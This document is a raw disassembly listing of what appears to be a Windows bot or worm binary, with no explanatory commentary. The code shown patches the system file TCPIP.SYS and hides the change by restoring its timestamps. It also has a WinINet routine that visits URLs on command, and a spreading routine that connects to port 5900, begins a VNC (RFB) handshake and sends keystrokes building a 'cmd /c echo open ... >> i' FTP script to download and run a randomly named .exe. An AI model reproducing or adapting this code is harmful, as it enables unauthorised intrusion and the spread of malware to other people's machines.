call dword_42F15C ; Sleep
lea eax, [ebp+var_240]
push eax
call sub_41FE4C
pop ecx
mov ebx, 80h
lea eax, [ebp+var_240]
push ebx
push eax
call dword_42F08C ; SetFileAttributesA
push edi
push ebx
push 3
push edi
push esi
lea eax, [ebp+var_240]
push 80000000h
push eax
call dword_42F060 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_420056
lea ecx, [ebp+var_9C]
push ecx
lea ecx, [ebp+var_94]
push ecx
lea ecx, [ebp+var_A4]
push ecx
push eax
call dword_42F11C ; GetFileTime
loc_42004D: ; DATA XREF: .text:00436A2C�o
; .text:00436A38�o
push [ebp+arg_0]
call dword_42F038 ; CloseHandle
loc_420056: ; CODE XREF: sub_41FE93+19C�j
lea eax, [ebp+var_240]
push offset off_448FE4
push eax
call sub_422F66
pop ecx
cmp eax, edi
pop ecx
mov [ebp+arg_0], eax
jnz short loc_4200C5
push [ebp+var_14]
lea eax, [ebp+var_1344]
push offset a68gmpWcesMnsrm ; "68gmp/wceS//Mnsrm1FhS.k."
push offset aSCannotOpenTcp ; "%s Cannot open TCPIP.SYS, version %d."
push 1000h
push eax
call sub_42219B
add esp, 14h
cmp [ebp+var_AC], edi
jz short loc_4200B2
lea eax, [ebp+var_1344]
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_38]
call sub_4104F6
add esp, 0Ch
loc_4200B2: ; CODE XREF: sub_41FE93+204�j
push [ebp+var_B8]
call sub_41C059
pop ecx
push edi
call dword_42F150 ; ExitThread
loc_4200C5: ; CODE XREF: sub_41FE93+1DB�j
mov eax, [ebp+var_14]
dec eax
jz loc_4202D3
dec eax
jz loc_42020E
dec eax
jz loc_420179
dec eax
jnz loc_420385
mov [ebp+var_34], 130h
mov [ebp+var_30], 4F5A2h
mov [ebp+var_4], edi
loc_4200F5: ; CODE XREF: sub_41FE93+2A1�j
mov eax, [ebp+var_4]
push edi
push [ebp+eax+var_34]
push [ebp+arg_0]
call sub_422E7C
push [ebp+arg_0]
push esi
push esi
push [ebp+var_C]
call sub_422BE2
mov eax, [ebp+var_4]
push esi
push [ebp+eax+var_4C]
push [ebp+var_C]
call sub_423AD0
add esp, 28h
test eax, eax
jnz short loc_42012C
inc [ebp+var_8]
loc_42012C: ; CODE XREF: sub_41FE93+294�j
add [ebp+var_4], 4
cmp [ebp+var_4], 0Ch
jl short loc_4200F5
cmp [ebp+var_8], 3
jge loc_420385
mov [ebp+var_10], esi
mov [ebp+var_4], edi
loc_420146: ; CODE XREF: sub_41FE93+2DF�j
mov eax, [ebp+var_4]
push edi
push [ebp+eax+var_34]
push [ebp+arg_0]
call sub_422E7C
push [ebp+arg_0]
mov eax, [ebp+var_4]
push esi
push esi
push [ebp+eax+var_4C]
call sub_424C08
add [ebp+var_4], 4
add esp, 1Ch
cmp [ebp+var_4], 0Ch
jl short loc_420146
jmp loc_420385
; ---------------------------------------------------------------------------
loc_420179: ; CODE XREF: sub_41FE93+244�j
mov [ebp+var_34], 130h
mov [ebp+var_30], 4F322h
mov [ebp+var_4], edi
loc_42018A: ; CODE XREF: sub_41FE93+336�j
mov eax, [ebp+var_4]
push edi
push [ebp+eax+var_34]
push [ebp+arg_0]
call sub_422E7C
push [ebp+arg_0]
push esi
push esi
push [ebp+var_C]
call sub_422BE2
mov eax, [ebp+var_4]
push esi
push [ebp+eax+var_40]
push [ebp+var_C]
call sub_423AD0
add esp, 28h
test eax, eax
jnz short loc_4201C1
inc [ebp+var_8]
loc_4201C1: ; CODE XREF: sub_41FE93+329�j
add [ebp+var_4], 4
cmp [ebp+var_4], 8
jl short loc_42018A
cmp [ebp+var_8], 2
jge loc_420385
mov [ebp+var_10], esi
mov [ebp+var_4], edi
loc_4201DB: ; CODE XREF: sub_41FE93+374�j
mov eax, [ebp+var_4]
push edi
push [ebp+eax+var_34]
push [ebp+arg_0]
call sub_422E7C
push [ebp+arg_0]
mov eax, [ebp+var_4]
push esi
push esi
push [ebp+eax+var_40]
call sub_424C08
add [ebp+var_4], 4
add esp, 1Ch
cmp [ebp+var_4], 8
jl short loc_4201DB
jmp loc_420385
; ---------------------------------------------------------------------------
loc_42020E: ; CODE XREF: sub_41FE93+23D�j
mov [ebp+var_34], 130h
mov [ebp+var_30], 131h
mov [ebp+var_2C], 132h
mov [ebp+var_28], 133h
mov [ebp+var_24], 4F5A2h
mov [ebp+var_20], 4F5A3h
mov [ebp+var_1C], 4F5A4h
mov [ebp+var_18], 4F5A5h
mov [ebp+var_4], edi
loc_420249: ; CODE XREF: sub_41FE93+3F8�j
mov eax, [ebp+var_4]
push edi
push [ebp+eax+var_34]
push [ebp+arg_0]
call sub_422E7C
push [ebp+arg_0]
push esi
push esi
push [ebp+var_C]
call sub_422BE2
mov eax, [ebp+var_4]
push esi
push [ebp+eax+var_8C]
push [ebp+var_C]
call sub_423AD0
add esp, 28h
test eax, eax
jnz short loc_420283
inc [ebp+var_8]
loc_420283: ; CODE XREF: sub_41FE93+3EB�j
add [ebp+var_4], 4
cmp [ebp+var_4], 20h
jl short loc_420249
cmp [ebp+var_8], 8
jge loc_420385
mov [ebp+var_10], esi
mov [ebp+var_4], edi
loc_42029D: ; CODE XREF: sub_41FE93+439�j
mov eax, [ebp+var_4]
push edi
push [ebp+eax+var_34]
push [ebp+arg_0]
call sub_422E7C
push [ebp+arg_0]
mov eax, [ebp+var_4]
push esi
push esi
push [ebp+eax+var_8C]
call sub_424C08
add [ebp+var_4], 4
add esp, 1Ch
cmp [ebp+var_4], 20h
jl short loc_42029D
jmp loc_420385
; ---------------------------------------------------------------------------
loc_4202D3: ; CODE XREF: sub_41FE93+236�j
mov [ebp+var_34], 130h
mov [ebp+var_30], 131h
mov [ebp+var_2C], 132h
mov [ebp+var_28], 133h
mov [ebp+var_24], 4F322h
mov [ebp+var_20], 4F323h
mov [ebp+var_1C], 4F324h
mov [ebp+var_18], 4F325h
mov [ebp+var_4], edi
loc_42030E: ; CODE XREF: sub_41FE93+4BA�j
mov eax, [ebp+var_4]
push edi
push [ebp+eax+var_34]
push [ebp+arg_0]
call sub_422E7C
push [ebp+arg_0]
push esi
push esi
push [ebp+var_C]
call sub_422BE2
mov eax, [ebp+var_4]
push esi
push [ebp+eax+var_6C]
push [ebp+var_C]
call sub_423AD0
add esp, 28h
test eax, eax
jnz short loc_420345
inc [ebp+var_8]
loc_420345: ; CODE XREF: sub_41FE93+4AD�j
add [ebp+var_4], 4
cmp [ebp+var_4], 20h
jl short loc_42030E
cmp [ebp+var_8], 8
jge short loc_420385
mov [ebp+var_10], esi
xor ebx, ebx
loc_42035A: ; CODE XREF: sub_41FE93+4EB�j
push edi
push [ebp+ebx+var_34]
push [ebp+arg_0]
call sub_422E7C
push [ebp+arg_0]
push esi
push esi
push [ebp+ebx+var_6C]
call sub_424C08
add ebx, 4
add esp, 1Ch
cmp ebx, 20h
jl short loc_42035A
mov ebx, 80h
loc_420385: ; CODE XREF: sub_41FE93+24B�j
; sub_41FE93+2A7�j ...
push [ebp+arg_0]
call sub_422B65
pop ecx
lea eax, [ebp+var_240]
push edi
push ebx
push 3
push edi
push 2
push 40000000h
push eax
call dword_42F060 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4203D1
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_94]
push eax
lea eax, [ebp+var_A4]
push eax
push esi
call dword_42F118 ; SetFileTime
push esi
call dword_42F038 ; CloseHandle
loc_4203D1: ; CODE XREF: sub_41FE93+519�j
cmp [ebp+var_10], edi
jz short loc_420418
push [ebp+var_14]
lea eax, [ebp+var_1344]
push offset a68gmpWcesMnsrm ; "68gmp/wceS//Mnsrm1FhS.k."
push offset aSTcpip_sysFixe ; "%s TCPIP.SYS fixed, version %d."
push 1000h
push eax
call sub_42219B
add esp, 14h
cmp [ebp+var_AC], edi
jz short loc_420418
lea eax, [ebp+var_1344]
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_38]
call sub_4104F6
add esp, 0Ch
loc_420418: ; CODE XREF: sub_41FE93+541�j
; sub_41FE93+56A�j
push [ebp+var_B8]
call sub_41C059
pop ecx
push edi
call dword_42F150 ; ExitThread
sub_41FE93 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42042B proc near ; DATA XREF: sub_403B2C+65D6�o
var_1464 = byte ptr -1464h
var_464 = byte ptr -464h
var_364 = byte ptr -364h
var_2E4 = byte ptr -2E4h
var_264 = byte ptr -264h
var_1E4 = dword ptr -1E4h
var_1DC = byte ptr -1DCh
var_15C = byte ptr -15Ch
var_DC = byte ptr -0DCh
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1464h
call sub_4220C0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 67h
mov esi, eax
pop ecx
lea edi, [ebp+var_1E4]
rep movsd
xor esi, esi
mov edi, 80h
inc esi
xor ebx, ebx
mov [eax+198h], esi
mov eax, [ebp+var_1E4]
mov [ebp+arg_0], eax
push edi
lea eax, [ebp+var_364]
push ebx
push eax
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_C], offset asc_4490E4 ; "*/*"
call sub_4221F0
push edi
lea eax, [ebp+var_2E4]
push ebx
push eax
call sub_4221F0
push edi
lea eax, [ebp+var_264]
push ebx
push eax
call sub_4221F0
push 100h
lea eax, [ebp+var_464]
push ebx
push eax
call sub_4221F0
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_4221F0
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_1DC]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_1DC]
push eax
call dword_4541F4 ; InternetCrackUrlA
test eax, eax
jz loc_4205DD
cmp [ebp+var_34], ebx
jbe short loc_42050F
push [ebp+var_34]
lea eax, [ebp+var_364]
push [ebp+var_38]
push eax
call sub_4222F0
add esp, 0Ch
loc_42050F: ; CODE XREF: sub_42042B+CD�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_42052D
push [ebp+var_28]
lea eax, [ebp+var_2E4]
push [ebp+var_2C]
push eax
call sub_4222F0
add esp, 0Ch
loc_42052D: ; CODE XREF: sub_42042B+EB�j
cmp [ebp+var_20], ebx
jbe short loc_420547
push [ebp+var_20]
lea eax, [ebp+var_264]
push [ebp+var_24]
push eax
call sub_4222F0
add esp, 0Ch
loc_420547: ; CODE XREF: sub_42042B+105�j
cmp [ebp+var_18], ebx
jbe short loc_420561
push [ebp+var_18]
lea eax, [ebp+var_464]
push [ebp+var_1C]
push eax
call sub_4222F0
add esp, 0Ch
loc_420561: ; CODE XREF: sub_42042B+11F�j
push ebx
push ebx
lea eax, [ebp+var_264]
push 3
push eax
lea eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_364]
push esi
push eax
push dword_4542B8
call dword_4542E0 ; InternetConnectA
mov edi, eax
cmp edi, ebx
jz short loc_4205F8
push ebx
lea eax, [ebp+var_C]
push 200h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_464]
push ebx
push eax
push ebx
push edi
call dword_4542D4 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_420604
push ebx
push ebx
push ebx
push ebx
push eax
call dword_454278 ; HttpSendRequestA
test eax, eax
push offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
lea eax, [ebp+var_1464]
jz short loc_4205D6
push offset aSUrlVisited_ ; "%s URL visited."
jmp short loc_420614
; ---------------------------------------------------------------------------
loc_4205D6: ; CODE XREF: sub_42042B+1A2�j
push offset aSFailedToGetRe ; "%s Failed to get requested URL from HTT"...
jmp short loc_420614
; ---------------------------------------------------------------------------
loc_4205DD: ; CODE XREF: sub_42042B+C4�j
push offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
lea eax, [ebp+var_1464]
push offset aSInvalidUrl_ ; "%s Invalid URL."
push eax
call sub_422063
mov edi, [ebp+var_8]
jmp short loc_42061A
; ---------------------------------------------------------------------------
loc_4205F8: ; CODE XREF: sub_42042B+160�j
push offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
push offset aSCouldNotOpenA ; "%s Could not open a connection."
jmp short loc_42060E
; ---------------------------------------------------------------------------
loc_420604: ; CODE XREF: sub_42042B+188�j
push offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
push offset aSFailedToConne ; "%s Failed to connect to HTTP server."
loc_42060E: ; CODE XREF: sub_42042B+1D7�j
lea eax, [ebp+var_1464]
loc_420614: ; CODE XREF: sub_42042B+1A9�j
; sub_42042B+1B0�j
push eax
call sub_422063
loc_42061A: ; CODE XREF: sub_42042B+1CB�j
add esp, 0Ch
cmp [ebp+var_58], ebx
mov esi, offset aS_1 ; "%s"
jnz short loc_420646
cmp [ebp+var_54], ebx
jnz short loc_42064B
lea eax, [ebp+var_1464]
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 10h
loc_420646: ; CODE XREF: sub_42042B+1FA�j
cmp [ebp+var_54], ebx
jz short loc_420665
loc_42064B: ; CODE XREF: sub_42042B+1FF�j
lea eax, [ebp+var_1464]
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 10h
loc_420665: ; CODE XREF: sub_42042B+21E�j
push edi
call dword_454348 ; InternetCloseHandle
push [ebp+var_4]
call dword_454348 ; InternetCloseHandle
push [ebp+var_5C]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
pop edi
pop esi
pop ebx
sub_42042B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420688 proc near ; CODE XREF: sub_420BEE+4A8�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, [ebp+arg_4]
lea eax, [ebp+var_8]
xor esi, esi
sub edi, eax
loc_420699: ; CODE XREF: sub_420688+32�j
push [ebp+arg_4]
call sub_422120
cmp esi, eax
pop ecx
jnb short loc_4206B1
lea eax, [ebp+esi+var_8]
mov cl, [edi+eax]
mov [eax], cl
jmp short loc_4206B6
; ---------------------------------------------------------------------------
loc_4206B1: ; CODE XREF: sub_420688+1C�j
and [ebp+esi+var_8], 0
loc_4206B6: ; CODE XREF: sub_420688+27�j
inc esi
cmp esi, 8
jb short loc_420699
lea eax, [ebp+var_8]
push 0
push eax
call sub_40AF5C
mov esi, [ebp+arg_0]
pop ecx
pop ecx
push 2
pop edi
loc_4206CF: ; CODE XREF: sub_420688+54�j
push esi
push esi
call sub_40B122
pop ecx
add esi, 8
dec edi
pop ecx
jnz short loc_4206CF
pop edi
pop esi
leave
retn
sub_420688 endp
; =============== S U B R O U T I N E =======================================
sub_4206E2 proc near ; CODE XREF: sub_420BEE+B0�p
; sub_420BEE+117�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
jmp short loc_42070D
; ---------------------------------------------------------------------------
loc_4206EC: ; CODE XREF: sub_4206E2+2D�j
mov eax, [esp+8+arg_4]
push 0
add eax, esi
push edi
push eax
push [esp+14h+arg_0]
call dword_454330 ; recv
test eax, eax
jz short loc_420717
cmp eax, 0FFFFFFFFh
jz short loc_420717
sub edi, eax
add esi, eax
loc_42070D: ; CODE XREF: sub_4206E2+8�j
test edi, edi
jg short loc_4206EC
xor eax, eax
inc eax
loc_420714: ; CODE XREF: sub_4206E2+37�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_420717: ; CODE XREF: sub_4206E2+20�j
; sub_4206E2+25�j
xor eax, eax
jmp short loc_420714
sub_4206E2 endp
; =============== S U B R O U T I N E =======================================
sub_42071B proc near ; CODE XREF: sub_420BEE+104�p
; sub_420BEE+18B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_420758
xor esi, esi
test edi, edi
jle short loc_420752
loc_42072B: ; CODE XREF: sub_42071B+35�j
mov eax, edi
push 0
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call dword_454350 ; send
cmp eax, 0FFFFFFFFh
jz short loc_420758
test eax, eax
jz short loc_420758
add esi, eax
cmp esi, edi
jl short loc_42072B
loc_420752: ; CODE XREF: sub_42071B+E�j
xor eax, eax
inc eax
loc_420755: ; CODE XREF: sub_42071B+3F�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_420758: ; CODE XREF: sub_42071B+8�j
; sub_42071B+2B�j ...
xor eax, eax
jmp short loc_420755
sub_42071B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42075C proc near ; CODE XREF: .text:004209D6�p
; .text:004209F3�p ...
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push esi
push edi
mov esi, offset dword_455610
lea edi, [ebp+var_10]
mov ax, word_449158
movsd
movsb
mov esi, offset dword_6313C0
lea edi, [ebp+var_18]
mov [ebp+var_2], ax
mov ax, word_449154
movsd
mov [ebp+var_6], ax
mov ax, word_44D6A0
movsw
mov [ebp+var_4], ax
mov eax, [ebp+arg_8]
xor esi, esi
cmp eax, esi
jnz loc_420825
mov edi, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+arg_8], esi
loc_4207AE: ; CODE XREF: sub_42075C+C4�j
mov eax, [ebp+arg_8]
sub eax, esi
jz short loc_4207CB
dec eax
jnz short loc_420819
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_454350 ; send
lea eax, [ebp+var_4]
jmp short loc_4207DC
; ---------------------------------------------------------------------------
loc_4207CB: ; CODE XREF: sub_42075C+57�j
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_454350 ; send
lea eax, [ebp+var_6]
loc_4207DC: ; CODE XREF: sub_42075C+6D�j
push esi
push 1
push eax
push edi
call dword_454350 ; send
push ebx
call sub_422120
pop ecx
cmp eax, 2
push esi
jnz short loc_4207FB
push 4
lea eax, [ebp+var_10]
jmp short loc_420800
; ---------------------------------------------------------------------------
loc_4207FB: ; CODE XREF: sub_42075C+96�j
push 5
lea eax, [ebp+var_18]
loc_420800: ; CODE XREF: sub_42075C+9D�j
push eax
push edi
call dword_454350 ; send
push esi
push ebx
call sub_422120
pop ecx
push eax
push ebx
push edi
call dword_454350 ; send
loc_420819: ; CODE XREF: sub_42075C+5A�j
inc [ebp+arg_8]
cmp [ebp+arg_8], 1
jle short loc_4207AE
pop ebx
jmp short loc_420898
; ---------------------------------------------------------------------------
loc_420825: ; CODE XREF: sub_42075C+42�j
dec eax
jz short loc_420841
dec eax
jnz short loc_420898
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_454350 ; send
lea eax, [ebp+var_4]
jmp short loc_420855
; ---------------------------------------------------------------------------
loc_420841: ; CODE XREF: sub_42075C+CA�j
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_454350 ; send
lea eax, [ebp+var_6]
loc_420855: ; CODE XREF: sub_42075C+E3�j
push esi
push 1
push eax
push edi
call dword_454350 ; send
push [ebp+arg_4]
call sub_422120
pop ecx
cmp eax, 2
push esi
jnz short loc_420876
push 4
lea eax, [ebp+var_10]
jmp short loc_42087B
; ---------------------------------------------------------------------------
loc_420876: ; CODE XREF: sub_42075C+111�j
push 5
lea eax, [ebp+var_18]
loc_42087B: ; CODE XREF: sub_42075C+118�j
push eax
push edi
call dword_454350 ; send
push esi
push [ebp+arg_4]
call sub_422120
pop ecx
push eax
push [ebp+arg_4]
push edi
call dword_454350 ; send
loc_420898: ; CODE XREF: sub_42075C+C7�j
; sub_42075C+CD�j
pop edi
pop esi
leave
retn
sub_42075C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
mov esi, offset dword_4491F4
lea edi, [ebp-40h]
mov ax, word_449154
movsd
movsd
movsd
movsb
mov esi, offset dword_4491F0
lea edi, [ebp-24h]
movsw
movsb
mov esi, offset dword_455610
lea edi, [ebp-30h]
movsd
movsb
mov esi, offset dword_4491EC
lea edi, [ebp-18h]
movsw
movsb
mov esi, offset dword_4491E8
lea edi, [ebp-20h]
movsw
movsb
mov esi, offset loc_4491E4
lea edi, [ebp-0Ch]
movsw
movsb
mov [ebp-6], ax
mov [ebp-12h], ax
mov ax, word_433EEC
xor esi, esi
mov [ebp-8], ax
mov ax, word_433F2C
push esi
push 1
push 2
mov [ebp-1Ah], ax
xor edi, edi
call dword_454394 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp-10h], ebx
jnz short loc_42092C
push eax
call dword_4543AC ; closesocket
loc_42092C: ; CODE XREF: .text:00420923�j
lea eax, [ebp+10h]
mov word ptr [ebp-50h], 2
push eax
call dword_45434C ; inet_addr
push 170Ch
mov [ebp-4Ch], eax
call dword_454314 ; ntohs
mov [ebp-4Eh], ax
lea eax, [ebp-50h]
push 10h
push eax
push ebx
call dword_4542AC ; connect
test eax, eax
jnz loc_420B6D
loc_420963: ; CODE XREF: .text:00420BAB�j
; .text:00420BE3�j
push 40h
lea eax, [ebp-90h]
push esi
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp-90h]
push esi
push 40h
push eax
push ebx
call dword_454330 ; recv
cmp eax, esi
jle short loc_4209C1
cmp eax, 0FFFFFFFFh
jz short loc_4209C1
mov eax, edi
sub eax, esi
jz loc_420BB0
dec eax
jz loc_420B7B
dec eax
jnz loc_420BE0
lea eax, [ebp-30h]
push eax
lea eax, [ebp-90h]
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_420B6D
loc_4209C1: ; CODE XREF: .text:00420988�j
; .text:0042098D�j ...
push esi
lea eax, [ebp-12h]
push 1
push eax
push ebx
call dword_454350 ; send
lea eax, [ebp-18h]
push 1
push eax
push ebx
call sub_42075C
mov esi, dword_42F15C
add esp, 0Ch
mov edi, 3E8h
push edi
call esi ; dword_42F15C
lea eax, [ebp-1Ah]
push 0
push eax
push ebx
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
lea eax, [ebp-18h]
push 2
push eax
push ebx
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
call sub_4220FC
push 9
pop ebx
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_4220FC
cdq
idiv ebx
lea eax, [ebp-190h]
push edx
push offset loc_43903C
push offset aSDDDD_exe ; "%s%d%d%d%d.exe"
push eax
call sub_422063
push 100h
mov ebx, offset byte_6312C0
push 0
push ebx
call sub_4221F0
lea eax, [ebp+10h]
push eax
call sub_414173
add esp, 2Ch
mov dword ptr [ebp-4], offset dword_455388
test eax, eax
jnz short loc_420A83
mov dword ptr [ebp-4], offset dword_4552D0
loc_420A83: ; CODE XREF: .text:00420A7A�j
lea eax, [ebp-190h]
push eax
lea eax, [ebp-190h]
push eax
call sub_4010E7
push eax
call sub_4010E7
push eax
push dword_44D680
push dword ptr [ebp-4]
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d >> i &echo user "...
push 0FFh
push ebx
call sub_42219B
and dword ptr [ebp-4], 0
push ebx
call sub_422120
add esp, 28h
test eax, eax
jbe short loc_420B06
loc_420AC7: ; CODE XREF: .text:00420B04�j
mov eax, [ebp-4]
movsx eax, byte_6312C0[eax]
push eax
push offset dword_44915C
lea eax, [ebp-28h]
push 3
push eax
call sub_42219B
lea eax, [ebp-28h]
push 0
push eax
push dword ptr [ebp-10h]
call sub_42075C
add esp, 1Ch
push 0Fh
call esi ; dword_42F15C
inc dword ptr [ebp-4]
push ebx
call sub_422120
cmp [ebp-4], eax
pop ecx
jb short loc_420AC7
loc_420B06: ; CODE XREF: .text:00420AC5�j
push edi
call esi ; dword_42F15C
mov ebx, [ebp-10h]
lea eax, [ebp-20h]
push 0
push eax
push ebx
call sub_42075C
add esp, 0Ch
push 7530h
call esi ; dword_42F15C
lea eax, [ebp-0Ch]
push 1
push eax
push ebx
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
lea eax, [ebp-8]
push 0
push eax
push ebx
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
lea eax, [ebp-0Ch]
push 2
push eax
push ebx
call sub_42075C
add esp, 0Ch
push edi
call esi ; dword_42F15C
mov eax, [ebp+0C8h]
xor esi, esi
lea eax, [eax+eax*8]
lea eax, ds:432090h[eax*8]
inc dword ptr [eax]
inc esi
loc_420B6D: ; CODE XREF: .text:0042095D�j
; .text:004209BB�j ...
push ebx
call dword_4543AC ; closesocket
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_420B7B: ; CODE XREF: .text:0042099A�j
lea eax, [ebp-24h]
push eax
lea eax, [ebp-90h]
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_420B6D
lea eax, [ebp-6]
push esi
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp-6]
push eax
push ebx
call dword_454350 ; send
push 2
pop edi
jmp loc_420963
; ---------------------------------------------------------------------------
loc_420BB0: ; CODE XREF: .text:00420993�j
lea eax, [ebp-40h]
push eax
lea eax, [ebp-90h]
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_420B6D
lea eax, [ebp-40h]
push esi
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp-40h]
push eax
push ebx
call dword_454350 ; send
xor edi, edi
inc edi
loc_420BE0: ; CODE XREF: .text:004209A1�j
cmp edi, 3
jnz loc_420963
jmp loc_4209C1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420BEE proc near ; CODE XREF: .text:00421450�p
var_118C = byte ptr -118Ch
var_18C = byte ptr -18Ch
var_8C = byte ptr -8Ch
var_7C = word ptr -7Ch
var_7A = word ptr -7Ah
var_78 = dword ptr -78h
var_6C = byte ptr -6Ch
var_60 = byte ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C0 = dword ptr 0C8h
arg_D0 = dword ptr 0D8h
arg_D8 = dword ptr 0E0h
push ebp
mov ebp, esp
mov eax, 118Ch
call sub_4220C0
push ebx
push esi
push edi
mov esi, offset dword_4491EC
lea edi, [ebp+var_10]
mov ax, word_433F2C
movsw
movsb
mov esi, offset dword_4491E8
lea edi, [ebp+var_24]
movsw
movsb
mov esi, offset loc_4491E4
lea edi, [ebp+var_C]
xor ebx, ebx
mov [ebp+var_14], ax
mov ax, word_433EEC
push ebx
movsw
push 1
push 2
mov dword_6312B8, ebx
mov [ebp+var_12], ax
movsb
call dword_454394 ; socket
cmp eax, 0FFFFFFFFh
jz loc_421119
lea eax, [ebp+arg_8]
push eax
call dword_45434C ; inet_addr
push 170Ch
mov [ebp+var_78], eax
mov [ebp+var_7C], 2
call dword_454314 ; ntohs
push 6
push 1
push 2
mov [ebp+var_7A], ax
call dword_42F29C ; socket
mov edi, eax
lea eax, [ebp+var_7C]
push 10h
push eax
push edi
mov [ebp+var_4], edi
call dword_4542AC ; connect
test eax, eax
jnz loc_421119
lea eax, [ebp+var_6C]
push 0Ch
push eax
push edi
call sub_4206E2
add esp, 0Ch
test eax, eax
jnz short loc_420CB1
loc_420CAA: ; CODE XREF: sub_420BEE+E7�j
; sub_420BEE+EE�j ...
xor esi, esi
jmp loc_420D5F
; ---------------------------------------------------------------------------
loc_420CB1: ; CODE XREF: sub_420BEE+BA�j
lea eax, [ebp+var_20]
and [ebp+var_60], 0
push eax
lea eax, [ebp+var_18]
push eax
mov esi, offset aRfb03d_03d ; "RFB %03d.%03d\n"
lea eax, [ebp+var_6C]
push esi
push eax
call sub_422725
add esp, 10h
push 3
pop eax
cmp [ebp+var_18], eax
jl short loc_420CAA
jnz short loc_420CDE
cmp [ebp+var_20], eax
